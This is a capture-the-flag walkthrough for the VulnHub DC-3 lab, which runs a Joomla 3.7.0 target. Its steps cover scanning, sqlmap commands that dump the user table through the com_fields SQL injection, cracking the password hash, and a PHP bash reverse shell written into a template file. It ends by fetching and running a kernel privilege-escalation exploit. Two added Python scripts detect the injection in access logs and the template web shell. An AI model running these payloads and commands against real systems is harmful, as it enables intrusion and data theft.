1. Target environment setup
Attack machine (Kali): 192.168.226.128
Target (DC-1): 192.168.226.129 (unknown at the start)
Target VM: DC: 3.2 ~ VulnHub
2. Preparation
2.1 IP address confirmation
Command: arp-scan -l (scans every device on the LAN and lists the IP, MAC address and vendor of each one)
arp-scan is a command-line ARP scanning tool for host discovery; it can find hosts on the local network that hide from other probes. It builds and sends ARP requests to the specified IP addresses and prints every response it gets back.
arp-scan lists every device connected to the local network even if the device runs a firewall: a firewall can drop ping, but it cannot block ARP packets.
2.2 port scanning
nmap -T4 -sV -O -A -p- 192.168.226.129
-T4 (timing template, faster), -sV (service version detection), -O (OS detection), -A (aggressive: OS and version detection, default scripts, traceroute), -p- (all 65535 ports)
2.3 website scanning
Use dirb http://192.168.226.129 to find the administrator login page
2.4 Visit the web page to gather information
There is no SSH service, but we have found the admin login page, so we can only escalate privileges step by step
2.5 view website structure
We can see that the CMS is Joomla, a content management system written in PHP with a MySQL database
The three major PHP CMSes: Drupal, WordPress and Joomla
3. Start of penetration
1. flag1
1.1 Obtain the Joomla version with a dedicated tool
joomscan --url http://192.168.226.129
The Wappalyzer Firefox plug-in shows that the target site's CMS is Joomla, so we use the dedicated tool joomscan to scan it
The command to install joomscan in Kali is sudo apt-get install joomscan
The scan shows that the target's Joomla version is 3.7.0
1.2. Vulnerability exploitation
Use the searchsploit tool to find the vulnerability in Joomla version 3.7.0
searchsploit Joomla 3.7.0
This confirms that the version has an SQL injection vulnerability
1.3 Looking up the vulnerability
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt (view the vulnerability write-up)
1.4 Dumping the database with sqlmap
sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
--dbs enumerates the databases; we expect the user data to be in joomladb
sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
-D "joomladb" --tables lists all tables in the joomladb database; we find the user table
sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
-D "joomladb" -T "#__users" --columns lists the columns of the user table in the joomladb database
sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,name,password,username --dump -p list[fullordering]
-D "joomladb" -T "#__users" -C id,name,password,username --dump dumps the specified columns
We found the username and password, but the password is stored as a hash
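From the defender's side, the sqlmap runs above leave a very recognisable trace in the web server's access log: requests to index.php with option=com_fields whose list[fullordering] parameter carries SQL function calls instead of a column name. The following Python is an added example (not part of this walkthrough) that parses combined-format log lines and flags that pattern. The three log lines are constructed. It also shows why matching on the user-agent alone is not enough: sqlmap was run with --random-agent, so the UA looks like a browser, but the injected parameter still gives it away.

```python
import re
from urllib.parse import parse_qs, urlparse

# Apache/nginx "combined" format:
# host ident user [timestamp] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# SQL functions/keywords that get injected through list[fullordering];
# a legitimate sort value looks like "a.ordering ASC", never a function call.
SQL_MARKERS = re.compile(r"\b(updatexml|extractvalue|sleep|benchmark|union|select)\b", re.I)


def classify(line):
    """Return (client_ip, reason) when a log line looks like the com_fields
    injection, or None for anything else (unparseable lines included)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["path"])
    if not url.path.endswith("index.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
    if qs.get("option") != ["com_fields"]:
        return None
    for value in qs.get("list[fullordering]", []):
        if SQL_MARKERS.search(value) or "(" in value:
            return (m["ip"], f"SQL in list[fullordering]: {value[:48]}")
    if "sqlmap" in m["ua"].lower():
        return (m["ip"], "sqlmap user-agent")
    return None


def scan(lines):
    """Run classify() over an iterable of log lines and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (not real traffic): a benign sort request, a
# sqlmap-style payload sent with a browser-like UA (what --random-agent does),
# and a request for an unrelated component.
SAMPLE_LOG = [
    '192.168.226.50 - - [10/Oct/2023:10:00:01 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.226.128 - - [10/Oct/2023:10:00:02 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=updatexml(1%2Cconcat(0x7e%2Cversion())%2C1)'
    ' HTTP/1.1" 500 312 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '192.168.226.51 - - [10/Oct/2023:10:00:03 +0000] "GET /index.php?option=com_content'
    '&view=article&id=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

Pointing scan() at a real access log (one line per iteration) is enough to build an alert; the parameter check is deliberately strict because no legitimate Joomla sort value contains parentheses or SQL functions.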
1.5 password cracking
Save the hash to a new file and crack it with john
The password is found to be snoopy
Log in to the admin backend at http://192.168.226.129/administrator
Write a one-line PHP reverse shell into the template's index.php, start a listener on Kali, then visit the index page again so the script executes
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.226.128/1212 0>&1'"); ?>
http://192.168.226.129/templates/beez3/index.php
The index page and the uploaded script live in the beez3 template directory
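The modification above is the classic way a compromised Joomla admin account turns into code execution: a template's index.php is edited in place. An added example, not from the original post, of the check a defender would run against the templates directory: every PHP file is compared with a deployment-time hash baseline and searched for shell-execution constructs. The directory tree, the baseline and the injected line are all constructed inside a temporary directory; ATTACKER_IP is a placeholder.

```python
import hashlib
import os
import re
import tempfile

# Shell-execution and obfuscation constructs that do not belong in a Joomla
# template's index.php; a hit is a strong web-shell indicator.
SUSPICIOUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
    r"|/dev/tcp/|base64_decode\s*\(",
    re.I,
)


def sha256_file(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def scan_templates(root, baseline):
    """Compare every .php file under root with a deploy-time baseline
    {relative_path: sha256} and grep it for SUSPICIOUS constructs.
    Returns a list of (relative_path, reason) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if rel not in baseline:
                findings.append((rel, "new file not in baseline"))
            elif baseline[rel] != sha256_file(full):
                findings.append((rel, "hash differs from baseline"))
            with open(full, "r", errors="replace") as fh:
                hit = SUSPICIOUS.search(fh.read())
            if hit:
                findings.append((rel, f"suspicious construct: {hit.group(0)}"))
    return findings


def demo():
    """Constructed scenario: baseline a clean beez3/index.php, then append the
    kind of one-liner used in the walkthrough and rescan.
    Returns (findings_before, findings_after)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "beez3"))
    index = os.path.join(root, "beez3", "index.php")
    with open(index, "w") as fh:
        fh.write("<?php defined('_JEXEC') or die; ?>\n<html><body>beez3</body></html>\n")
    baseline = {"beez3/index.php": sha256_file(index)}  # snapshot taken at deploy time
    clean = scan_templates(root, baseline)               # nothing changed yet
    # ATTACKER_IP is a placeholder; this is the pattern the detector must catch
    with open(index, "a") as fh:
        fh.write("<?php system(\"bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/1212 0>&1'\"); ?>\n")
    return clean, scan_templates(root, baseline)


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
```

The hash comparison catches any edit, including ones that use constructs the regex does not know about; the regex catches new files the baseline has never seen. Running both on a schedule, or from a file-integrity monitor, is what turns this backdoor into an alert.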
Check the OS version and search the exploit database
whoami
lsb_release -a
cat /etc/issue
Copy the vulnerability write-up to the local machine
searchsploit ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/
cat 39772.txt
3. Privilege escalation
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip   # unzip the 39772.zip file
cd 39772
tar -xvf exploit.tar   # extract the exploit tarball
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh   # compile the exploit
ls
./doubleput   # run the privilege escalation binary
whoami
cd /root
ls
cat the-flag.txt